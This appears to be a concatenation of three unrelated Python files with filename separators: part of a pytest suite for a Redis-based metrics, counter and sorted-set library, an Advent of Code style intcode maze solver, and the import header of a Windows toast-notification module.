assert len(data) == 1 and type(data[0]) == list and data[0][0] == 1234
# Behavior should be update
data = metrics.range("some_metric", 1, -1)
assert len(data) == 1
# Default behavior is MAX
assert data[0][1] == 2020
assert data[0][0] == 1234
def test_metrics_async(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, pipeline=pipeline)
assert data is None
data = metrics.get("some_metric")
assert data == (0, 0)
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
data = metrics.get("some_metric")
assert type(data[0]) == int and data[1] == 42
def test_metrics_add_multiple_simultaneous(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_other_metric", retention=10000
)
assert data == "some_other_metric"
data = caller.metrics_add("some_metric", 42)
assert data is not None
data = caller.metrics_add("some_other_metric", 2020)
assert data is not None
# make a metric and have the timestamp auto-created
data = metrics.range("some_metric", 1, -1)
assert len(data) == 1 and data[0][1] == 42
data = metrics.range("some_other_metric", 1, -1)
assert len(data) == 1 and data[0][1] == 2020
def test_metrics_add_multiple_simultaneous_async(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_other_metric", retention=10000
)
assert data == "some_other_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, pipeline=pipeline)
assert data is None
data = caller.metrics_add("some_other_metric", 2020, pipeline=pipeline)
assert data is None
time.sleep(0.001)
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
# make a metric and have the timestamp auto-created
data = metrics.range("some_metric", 1, -1)
assert len(data) == 1 and data[0][1] == 42
data = metrics.range("some_other_metric", 1, -1)
assert len(data) == 1 and data[0][1] == 2020
def test_metrics_add_multiple_async(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, pipeline=pipeline)
assert data is None
time.sleep(0.001)
data = caller.metrics_add("some_metric", 2020, pipeline=pipeline)
assert data is None
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
# make a metric and have the timestamp auto-created
data = metrics.range("some_metric", 1, -1)
assert len(data) == 2 and data[0][1] == 42 and data[1][1] == 2020
def test_metrics_add_multiple_async_handle_same_timestamp(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, timestamp=1234, pipeline=pipeline)
assert data is None
data = caller.metrics_add(
"some_metric", 2020, timestamp=1234, pipeline=pipeline
)
assert data is None
data = metrics.get("some_metric")
assert data == (0, 0)
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
# make a metric and have the timestamp auto-created
data = metrics.range("some_metric", 1, -1)
# There's a super-slim chance this makes it through if the
# calls are on a millisecond boundary
assert len(data) == 1 or (len(data) == 2)
# If there's only one piece of data, behavior should be MAX by default
if len(data) == 1:
assert data[0][1] == 2020
else:
assert data[0][1] == 42
assert data[1][1] == 2020
def test_metrics_async_timestamp_no_jitter(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
pipeline = caller.metrics_get_pipeline()
assert pipeline is not None
data = caller.metrics_add("some_metric", 42, pipeline=pipeline)
assert data is None
add_time = time.time()
data = metrics.get("some_metric")
assert data == (0, 0)
time.sleep(2.0)
flush_time = time.time()
data = caller.metrics_write_pipeline(pipeline)
assert data is not None
data = metrics.get("some_metric")
assert data[1] == 42
# Make sure the timestamp gets set at the flush and
# not the add
assert (int(1000 * add_time) - data[0]) <= 1000
assert (int(1000 * flush_time) - data[0]) >= 1900
def test_metrics_remote(self, caller, metrics):
my_elem = Element(
"test_metrics_no_redis", metrics_host="127.0.0.1", metrics_port=6380
)
assert my_elem is not None
data = my_elem.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
my_elem._clean_up()
def test_metrics_remote_nonexist(self, caller, metrics):
my_elem = Element(
"test_metrics_no_redis", metrics_host="127.0.0.1", metrics_port=6381
)
assert my_elem is not None
data = my_elem.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data is None
my_elem._clean_up()
def test_metrics_remote_nonexist_enforced(self, caller, metrics):
enforced = False
try:
Element(
"test_metrics_no_redis",
metrics_host="127.0.0.1",
metrics_port=6381,
enforce_metrics=True,
)
except AtomError as e:
print(e)
enforced = True
assert enforced is True
def test_metrics_socket_nonexist(self, caller, metrics):
my_elem = Element(
"test_metrics_no_redis", metrics_socket_path="/shared/nonexistent.sock"
)
assert my_elem is not None
data = my_elem.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data is None
my_elem._clean_up()
def test_metrics_socket_nonexist_enforced(self, caller, metrics):
enforced = False
try:
Element(
"test_metrics_no_redis",
metrics_socket_path="/shared/nonexistent.sock",
enforce_metrics=True,
)
except AtomError as e:
print(e)
enforced = True
assert enforced is True
def test_metrics_turned_off(self, caller, metrics):
os.environ["ATOM_USE_METRICS"] = "FALSE"
my_elem = Element("test_metrics_turned_off")
assert my_elem is not None
pipeline = my_elem.metrics_get_pipeline()
assert pipeline is None
data = my_elem.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data is None
data = my_elem.metrics_add("some_metric", 42)
assert data is None
data = my_elem.metrics_write_pipeline(pipeline)
assert data is None
my_elem._clean_up()
def test_counter_set(self, caller):
caller, caller_name = caller
for i in range(10):
counter_val = caller.counter_set("some_counter", i)
assert counter_val == i
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_get(self, caller):
caller, caller_name = caller
for i in range(10):
counter_val = caller.counter_set("some_counter", i)
assert counter_val == i
assert caller.counter_get("some_counter") == i
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_delete(self, caller):
caller, caller_name = caller
counter_val = caller.counter_set("some_counter", 32)
assert counter_val == 32
assert caller.counter_get("some_counter") == 32
success = caller.counter_delete("some_counter")
assert success == True
assert caller.counter_get("some_counter") is None
def test_counter_update(self, caller):
caller, caller_name = caller
counter_sum = 0
for i in range(20):
# Test 10 positive and 10 negative numbers
rand_val = random.randint(0, 1000)
if i % 2 == 0:
rand_val *= -1
# Add the value to the sum
counter_sum += rand_val
# Update the counter
counter_val = caller.counter_update("some_counter", rand_val)
# Make sure our sum matches the counter's
assert counter_sum == counter_val
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_set_update(self, caller):
caller, caller_name = caller
counter_val = caller.counter_set("some_counter", 40)
assert counter_val == 40
counter_val = caller.counter_update("some_counter", 2)
assert counter_val == 42
counter_val = caller.counter_update("some_counter", 0)
assert counter_val == 42
counter_val = caller.counter_update("some_counter", -1)
assert counter_val == 41
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_expire(self, caller):
caller, caller_name = caller
counter_val = caller.counter_set("some_counter", -27, timeout_ms=50)
assert counter_val == -27
time.sleep(0.1)
counter_val = caller.counter_get("some_counter")
assert counter_val is None
def test_multiple_counters(self, caller):
caller, caller_name = caller
counter1_sum = 0
counter2_sum = 0
for i in range(20):
# Test 10 positive and 10 negative numbers
rand_val_1 = random.randint(0, 1000)
rand_val_2 = random.randint(0, 1000)
if i % 2 == 0:
rand_val_1 *= -1
rand_val_2 *= -1
# Add the value to the sum
counter1_sum += rand_val_1
counter2_sum += rand_val_2
# Update the counter
counter1_val = caller.counter_update("some_counter1", rand_val_1)
assert counter1_sum == counter1_val
counter2_val = caller.counter_update("some_counter2", rand_val_2)
assert counter2_sum == counter2_val
success = caller.counter_delete("some_counter1")
assert success == True
success = caller.counter_delete("some_counter2")
assert success == True
def test_counter_set_pipelines(self, caller):
"""
Tests to make sure we're properly releasing pipelines. This should
raise a pipeline error if we're having issues and will check that the
pipeline pools for both redis and metrics are the proper size at the end
"""
caller, caller_name = caller
for i in range(2 * REDIS_PIPELINE_POOL_SIZE):
caller.counter_set("some_counter", 0)
assert caller._rpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
assert caller._mpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_update_pipelines(self, caller):
"""
Tests to make sure we're properly releasing pipelines. This should
raise a pipeline error if we're having issues and will check that the
pipeline pools for both redis and metrics are the proper size at the end
"""
caller, caller_name = caller
for i in range(2 * REDIS_PIPELINE_POOL_SIZE):
caller.counter_update("some_counter", 1)
assert caller._rpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
assert caller._mpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_get_pipelines(self, caller):
"""
Tests to make sure we're properly releasing pipelines. This should
raise a pipeline error if we're having issues and will check that the
pipeline pools for both redis and metrics are the proper size at the end
"""
caller, caller_name = caller
caller.counter_set("some_counter", 239829)
for i in range(2 * REDIS_PIPELINE_POOL_SIZE):
caller.counter_get("some_counter")
assert caller._rpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
assert caller._mpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
success = caller.counter_delete("some_counter")
assert success == True
def test_counter_delete_pipelines(self, caller):
"""
Tests to make sure we're properly releasing pipelines. This should
raise a pipeline error if we're having issues and will check that the
pipeline pools for both redis and metrics are the proper size at the end
"""
caller, caller_name = caller
for i in range(2 * REDIS_PIPELINE_POOL_SIZE):
caller.counter_set("some_counter", i)
success = caller.counter_delete("some_counter")
assert success == True
assert caller._rpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
assert caller._mpipeline_pool.qsize() == REDIS_PIPELINE_POOL_SIZE
def test_set_add(self, caller):
caller, caller_name = caller
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
value = caller.sorted_set_read("some_set", member)
assert value == i
caller.sorted_set_delete("some_set")
def test_set_size(self, caller):
caller, caller_name = caller
n_items = 10
for i in range(n_items):
member = f"key{i}"
add_cardinality = caller.sorted_set_add("some_set", member, i)
size_cardinality = caller.sorted_set_size("some_set")
assert add_cardinality == size_cardinality
caller.sorted_set_delete("some_set")
def test_set_size_no_set(self, caller):
caller, caller_name = caller
size = caller.sorted_set_size("some_set")
assert size == 0
def test_set_update(self, caller):
caller, caller_name = caller
n_items = 10
for i in range(n_items):
member = "same_value"
caller.sorted_set_add("some_set", member, i)
value = caller.sorted_set_read("some_set", member)
assert value == i
caller.sorted_set_delete("some_set")
def test_set_range_min_withvalues(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_min_slice_withvalues(self, caller):
caller, caller_name = caller
values = []
slice_start = 3
slice_end = 5
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
if i >= slice_start and i <= slice_end:
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", slice_start, slice_end)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_min_novalues(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append(member.encode("utf-8"))
set_range = caller.sorted_set_range("some_set", 0, -1, withvalues=False)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_max_withvalues(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1, maximum=True)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_max_slice_withvalues(self, caller):
caller, caller_name = caller
values = []
slice_start = 1
slice_end = 7
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
if i <= (n_items - 1 - slice_start) and i >= (n_items - 1 - slice_end):
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range(
"some_set", slice_start, slice_end, maximum=True
)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_range_max_novalues(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, member.encode("utf-8"))
set_range = caller.sorted_set_range(
"some_set", 0, -1, maximum=True, withvalues=False
)
assert set_range == values
caller.sorted_set_delete("some_set")
def test_set_pop_min(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
for i in range(n_items):
pop_val, cardinality = caller.sorted_set_pop("some_set")
assert values[0] == pop_val
assert cardinality == n_items - i - 1
values.pop(0)
# No delete -- set disappears on its own when final member popped
def test_set_pop_min_blocking(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
for i in range(n_items):
pop_val, cardinality = caller.sorted_set_pop(
"some_set", block=True, timeout=0.1
)
assert values[0] == pop_val
assert cardinality == n_items - i - 1
values.pop(0)
# No delete -- set disappears on its own when final member popped
def test_set_pop_no_exist(self, caller):
caller, caller_name = caller
passed = False
try:
pop_val, cardinality = caller.sorted_set_pop("some_set")
except SetEmptyError:
passed = True
assert passed == True
# No delete -- set disappears on its own when final member popped
def test_set_pop_no_exist_blocking(self, caller):
caller, caller_name = caller
passed = False
block_time = 0.1
start_time = time.time()
try:
pop_val, cardinality = caller.sorted_set_pop(
"some_set", block=True, timeout=block_time
)
except SetEmptyError:
passed = True
end_time = time.time()
assert passed == True
assert end_time - start_time >= block_time
# No delete -- set disappears on its own when final member popped
def test_set_pop_empty(self, caller):
caller, caller_name = caller
cardinality = caller.sorted_set_add("some_set", "member", 23)
assert cardinality == 1
pop_val, cardinality = caller.sorted_set_pop("some_set")
assert pop_val == (b"member", 23)
assert cardinality == 0
passed = False
try:
pop_val, cardinality = caller.sorted_set_pop("some_set")
except SetEmptyError:
passed = True
assert passed == True
# No delete -- set disappears on its own when final member popped
def test_set_pop_max(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1, maximum=True)
assert set_range == values
for i in range(n_items):
pop_val, cardinality = caller.sorted_set_pop("some_set", maximum=True)
assert values[0] == pop_val
assert cardinality == n_items - i - 1
values.pop(0)
# No delete -- set disappears on its own when final member popped
def test_set_pop_max_blocking(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1, maximum=True)
assert set_range == values
for i in range(n_items):
pop_val, cardinality = caller.sorted_set_pop(
"some_set", maximum=True, block=True, timeout=0.1
)
assert values[0] == pop_val
assert cardinality == n_items - i - 1
values.pop(0)
# No delete -- set disappears on its own when final member popped
def test_set_pop_max_no_exist(self, caller):
caller, caller_name = caller
passed = False
try:
pop_val, cardinality = caller.sorted_set_pop("some_set", maximum=True)
except SetEmptyError:
passed = True
assert passed == True
# No delete -- set disappears on its own when final member popped
def test_set_pop_max_no_exist_blocking(self, caller):
caller, caller_name = caller
passed = False
block_time = 1.0
start_time = time.time()
try:
pop_val, cardinality = caller.sorted_set_pop(
"some_set", maximum=True, block=True, timeout=block_time
)
except SetEmptyError:
passed = True
end_time = time.time()
assert passed == True
assert end_time - start_time >= block_time
# No delete -- set disappears on its own when final member popped
def test_set_pop_maximum_empty(self, caller):
caller, caller_name = caller
cardinality = caller.sorted_set_add("some_set", "member", 23)
assert cardinality == 1
pop_val, cardinality = caller.sorted_set_pop("some_set", maximum=True)
assert pop_val == (b"member", 23)
assert cardinality == 0
passed = False
try:
pop_val, cardinality = caller.sorted_set_pop("some_set", maximum=True)
except SetEmptyError:
passed = True
assert passed == True
# No delete -- set disappears on its own when final member popped
def test_set_remove(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
for i in range(n_items):
member = f"key{i}"
caller.sorted_set_remove("some_set", member)
values.pop(0)
if values:
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
# No delete -- set disappears on its own when final member popped
def test_set_pop_n(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.append((member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1)
assert set_range == values
# We'll pop in 2 chunks, once and then the rest
pop_chunk_size = 3
pop_vals, cardinality = caller.sorted_set_pop_n("some_set", pop_chunk_size)
assert values[0:pop_chunk_size] == pop_vals
assert cardinality == n_items - pop_chunk_size
pop_vals, cardinality = caller.sorted_set_pop_n("some_set", n_items)
assert values[pop_chunk_size:n_items] == pop_vals
assert cardinality == 0
passed = False
try:
pop_vals, cardinality = caller.sorted_set_pop_n("some_set", 1)
except SetEmptyError:
passed = True
assert passed == True
def test_set_pop_n_max(self, caller):
caller, caller_name = caller
values = []
n_items = 10
for i in range(n_items):
member = f"key{i}"
cardinality = caller.sorted_set_add("some_set", member, i)
assert cardinality == i + 1
values.insert(0, (member.encode("utf-8"), float(i)))
set_range = caller.sorted_set_range("some_set", 0, -1, maximum=True)
assert set_range == values
# We'll pop in 2 chunks, once and then the rest
pop_chunk_size = 3
pop_vals, cardinality = caller.sorted_set_pop_n(
"some_set", pop_chunk_size, maximum=True
)
assert values[0:pop_chunk_size] == pop_vals
assert cardinality == n_items - pop_chunk_size
pop_vals, cardinality = caller.sorted_set_pop_n(
"some_set", n_items, maximum=True
)
assert values[pop_chunk_size:n_items] == pop_vals
assert cardinality == 0
passed = False
try:
pop_vals, cardinality = caller.sorted_set_pop_n("some_set", 1)
except SetEmptyError:
passed = True
assert passed == True
def add_1(x):
return Response(int(x) + 1)
def sleep_ms(x):
time.sleep(x / 1000.0)
|
15-oxygen-2.py
|
import sys
import unittest
from intcode_threaded import Machine
from queue import Queue
import threading
import os
import time
import numpy as np
from colorama import Fore, Back, Style
#Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
#Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
#Style: DIM, NORMAL, BRIGHT, RESET_ALL
INPUT = "3,1033,1008,1033,1,1032,1005,1032,31,1008,1033,2,1032,1005,1032,58,1008,1033,3,1032,1005,1032,81,1008,1033,4,1032,1005,1032,104,99,1001,1034,0,1039,1001,1036,0,1041,1001,1035,-1,1040,1008,1038,0,1043,102,-1,1043,1032,1,1037,1032,1042,1105,1,124,102,1,1034,1039,1001,1036,0,1041,1001,1035,1,1040,1008,1038,0,1043,1,1037,1038,1042,1106,0,124,1001,1034,-1,1039,1008,1036,0,1041,101,0,1035,1040,1001,1038,0,1043,102,1,1037,1042,1106,0,124,1001,1034,1,1039,1008,1036,0,1041,1001,1035,0,1040,1001,1038,0,1043,1002,1037,1,1042,1006,1039,217,1006,1040,217,1008,1039,40,1032,1005,1032,217,1008,1040,40,1032,1005,1032,217,1008,1039,39,1032,1006,1032,165,1008,1040,39,1032,1006,1032,165,1101,0,2,1044,1105,1,224,2,1041,1043,1032,1006,1032,179,1102,1,1,1044,1105,1,224,1,1041,1043,1032,1006,1032,217,1,1042,1043,1032,1001,1032,-1,1032,1002,1032,39,1032,1,1032,1039,1032,101,-1,1032,1032,101,252,1032,211,1007,0,69,1044,1106,0,224,1102,0,1,1044,1105,1,224,1006,1044,247,1001,1039,0,1034,101,0,1040,1035,1001,1041,0,1036,101,0,1043,1038,102,1,1042,1037,4,1044,1105,1,0,14,64,25,87,47,95,19,65,33,21,99,74,49,51,99,41,76,12,91,19,39,77,68,1,94,19,16,66,72,56,21,81,96,48,35,31,95,41,65,21,84,74,61,27,81,17,77,75,63,80,38,74,91,51,77,30,51,50,93,81,57,78,84,5,32,90,83,21,87,54,92,64,55,81,96,55,89,45,58,37,31,88,51,70,15,93,13,68,76,58,96,34,22,93,27,84,13,27,95,57,88,14,72,96,50,13,54,94,14,92,58,30,6,73,78,56,41,71,86,30,81,2,80,58,90,19,97,43,41,13,96,95,89,19,79,99,77,46,53,23,84,74,62,51,86,40,88,23,75,83,97,95,5,5,86,81,18,45,94,99,79,83,6,82,60,60,97,89,74,24,3,81,85,41,39,89,45,90,80,8,45,92,11,96,99,88,58,75,31,44,5,92,82,38,22,9,57,5,77,65,5,74,87,81,10,46,87,12,52,76,22,25,74,76,61,88,92,14,96,44,80,20,23,24,76,72,64,78,97,87,9,2,91,10,32,78,70,65,70,85,51,1,6,84,83,84,62,70,40,31,96,73,85,12,85,5,53,98,58,78,24,80,70,7,77,60,71,63,13,94,8,85,7,91,47,35,89,18,44,70,71,98,68,99,14,84,82,3,79,38,68,70,44,34,96,35,87,29,95,48,85,30,96,58,16,74,2,78,96,82,20,14,41,22,88,74,13,86,21,28,93,60,92,72,50,43,95,29,97,97,74,23,87,30,62,89,3,90,77,36,42,70,76,18,96,46,93,68,94,25,95,52,83,95,36,39,87,32,23,88,33,96,31,90,15,96,81,45,44,77,64,38,98,75,71,47,99,88,29,85,30,83,48,93,5,28,86,21,16,93,17,99,68,13,87,71,97,56,84,43,26,70,21,66,82,46,96,84,37,85,90,79,33,57,87,73,40,56,45,87,37,91,28,61,89,87,89,16,46,11,77,89,5,3,71,68,61,91,76,16,85,16,83,50,41,31,71,87,20,60,80,48,24,80,7,85,98,62,91,75,46,11,80,36,26,41,24,92,98,53,73,66,73,75,31,23,88,28,89,84,25,78,58,91,77,55,64,70,46,99,71,38,84,15,50,97,85,15,36,77,25,88,70,81,78,58,54,4,34,92,97,13,4,92,80,71,52,16,93,29,99,2,87,37,99,20,73,59,10,44,91,9,2,72,94,1,76,47,79,91,1,18,86,6,10,86,35,81,20,54,98,87,48,65,85,56,68,85,71,55,82,80,19,25,70,87,31,90,87,80,53,51,90,42,87,86,1,91,49,82,21,79,88,54,28,1,78,54,81,47,12,73,79,5,22,89,71,93,63,56,93,33,83,47,75,36,49,81,10,80,99,49,26,51,78,39,70,79,49,95,16,44,97,8,19,60,95,88,17,78,55,77,60,87,25,53,72,26,42,78,7,72,86,51,31,90,40,61,75,61,85,99,4,90,22,37,95,15,64,93,70,48,7,50,81,92,46,15,73,54,81,91,63,34,93,91,58,82,78,89,55,29,96,80,78,3,82,38,57,85,51,83,79,78,88,53,7,78,71,48,92,43,61,96,11,29,77,91,53,1,20,92,56,86,34,20,70,67,91,14,79,92,31,21,82,75,52,89,37,7,10,85,17,66,86,73,8,31,95,49,78,74,6,77,98,71,49,76,90,78,9,81,79,89,63,92,36,79,53,80,20,77,94,96,1,87,45,77,94,80,3,92,96,97,9,73,35,77,66,98,0,0,21,21,1,10,1,0,0,0,0,0,0"
NORTH = 1
SOUTH = 2
WEST = 3
EAST = 4
REVERSE = {
NORTH: SOUTH,
SOUTH: NORTH,
WEST: EAST,
EAST: WEST
}
WALL = 0
EMPTY = 1
OXYGEN = 2
START = 3
class ShipMap:
def __init__(self):
self.cells = {}
self.cells[(0,0)] = EMPTY
def mapped(self,point):
return point in self.cells
def get_type(self,point):
return self.cells[point]
# Assumes point is unmapped
def set_type(self,point,cell_type):
self.cells[point] = cell_type
def get_oxygen(self):
for point, info in self.cells.items():
if info == OXYGEN:
return point
return None
def get_empty(self):
result = set()
for point, info in self.cells.items():
if info == EMPTY:
result.add(point)
return result
def get_neighbours(self,point):
result = []
if self.cells[point] == WALL:
raise Exception("It's a WALL!")
for direction in [EAST,NORTH,SOUTH,WEST]:
new_point = move_to(point,direction)
if self.cells[new_point] != WALL:
result.append(new_point)
return result
def draw(self):
points = list(self.cells.keys())
x_min = np.min([p[0] for p in points])
x_max = np.max([p[0] for p in points])
y_min = np.min([p[1] for p in points])
y_max = np.max([p[1] for p in points])
os.system('clear')
map_chars = {
WALL: Fore.CYAN + 'X' + Style.RESET_ALL,
EMPTY: ' ',
OXYGEN: Back.WHITE + Fore.RED + Style.BRIGHT+ 'O' + Style.RESET_ALL,
START: Back.WHITE + Fore.GREEN + Style.BRIGHT + 'S' + Style.RESET_ALL
}
for y in range(y_min,y_max+1):
line = []
for x in range(x_min,x_max+1):
if (x,y) in points:
if x==0 and y==0:
line.append(map_chars[START])
elif self.cells[(x,y)] == WALL:
line.append(map_chars[WALL])
elif self.cells[(x,y)] == EMPTY:
line.append(' ')
elif self.cells[(x,y)] == OXYGEN:
line.append(map_chars[OXYGEN])
else:
line.append(map_chars[WALL])
print(''.join(line))
# Steps to increment for each code
def debug(arg):
#pass
print(arg)
def move_to(point,direction):
if direction == NORTH:
return (point[0],point[1]+1)
elif direction == SOUTH:
return (point[0],point[1]-1)
elif direction == EAST:
return (point[0]+1,point[1])
elif direction == WEST:
return (point[0]-1,point[1])
def forage(machine,ship_map,point):
if not (ship_map.mapped(point)):
raise Exception("Unmapped Point: {}".format(point))
# If this point and all the points around are mapped, then return
mapped = True
for direction in [EAST,NORTH,SOUTH,WEST]:
mapped = mapped and ship_map.mapped(move_to(point,direction))
if mapped:
return True
for direction in [EAST,NORTH,SOUTH,WEST]:
new_point = move_to(point,direction)
if not ship_map.mapped(new_point):
machine.io['input'].put(direction)
answer = machine.io['output'].get()
machine.io['output'].task_done()
ship_map.set_type(new_point,answer)
if answer != WALL:
forage(machine,ship_map,new_point)
# backtrack. Doh!
machine.io['input'].put(REVERSE[direction])
answer = machine.io['output'].get()
machine.io['output'].task_done()
return True
MASSIVE = 1000000
# Dynamic programming solution
def distance(ship_map,distances,ignore,point1,point2):
if ship_map.get_type(point1) == WALL:
raise Exception("{} is a WALL!".format(point1))
if ship_map.get_type(point2) == WALL:
raise Exception("{} is a WALL!".format(point2))
# Have we calculated this already?
if point1 in distances:
if point2 in distances[point1]:
return distances[point1][point2]
# Are they adjacent?
if point2 in ship_map.get_neighbours(point1):
if not point1 in distances:
distances[point1] = {}
distances[point1][point2] = 1
if not point2 in distances:
distances[point2] = {}
distances[point2][point1] = 1
return 1
# Something massive
minimum = MASSIVE
# Split into sub-problems. But only if the neighbour isn't being ignored.
for neighbour in ship_map.get_neighbours(point1):
if not neighbour in ignore:
new_ignore = ignore.copy()
new_ignore.add(neighbour)
d1 = distance(ship_map,distances,new_ignore,point1,neighbour)
d2 = distance(ship_map,distances,new_ignore,neighbour,point2)
if d1+d2 < minimum:
minimum = d1+d2
# If it's a real distance, cache it.
if minimum < MASSIVE:
if not point1 in distances:
distances[point1] = {}
distances[point1][point2] = minimum
if not point2 in distances:
distances[point2] = {}
distances[point2][point1] = minimum
return minimum
if __name__=='__main__':
program = [int(s) for s in INPUT.split(",")]
machine = Machine()
machine.memory = program.copy()
machine.counter = 0
machine.trace = False
machine.io = {'input': Queue(), 'output': Queue()}
t = threading.Thread(target=machine.run)
t.setDaemon(True)
t.start()
ship_map = ShipMap()
ship_map.set_type((0,0),EMPTY)
forage(machine,ship_map,(0,0))
ship_map.draw()
destination = ship_map.get_oxygen()
print(destination)
# Get all empty cells and calculate maximum distance to oxygen unit
empty_cells = ship_map.get_empty()
# print(empty_cells)
maximum = 0
distances = {}
for c in empty_cells:
dist = distance(ship_map,distances,set(),c,(18,-18))
if dist > maximum:
maximum = dist
print(maximum)
|
__init__.py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
__all__ = ['ToastNotifier']
# #############################################################################
# ########## Libraries #############
# ##################################
# standard library
import logging
import threading
from os import path
from time import sleep
from pkg_resources import Requirement
from pkg_resources import resource_filename
# 3rd party modules
from win32api import GetModuleHandle
from win32api import PostQuitMessage
from win32con import CW_USEDEFAULT
from win32con import IDI_APPLICATION
from win32con import IMAGE_ICON
from win32con import LR_DEFAULTSIZE
from win32con import LR_LOADFROMFILE
from win32con import WM_DESTROY
from win32con import WM_USER
from win32con import WS_OVERLAPPED
from win32con import WS_SYSMENU
from win32gui import CreateWindow
from win32gui import DestroyWindow
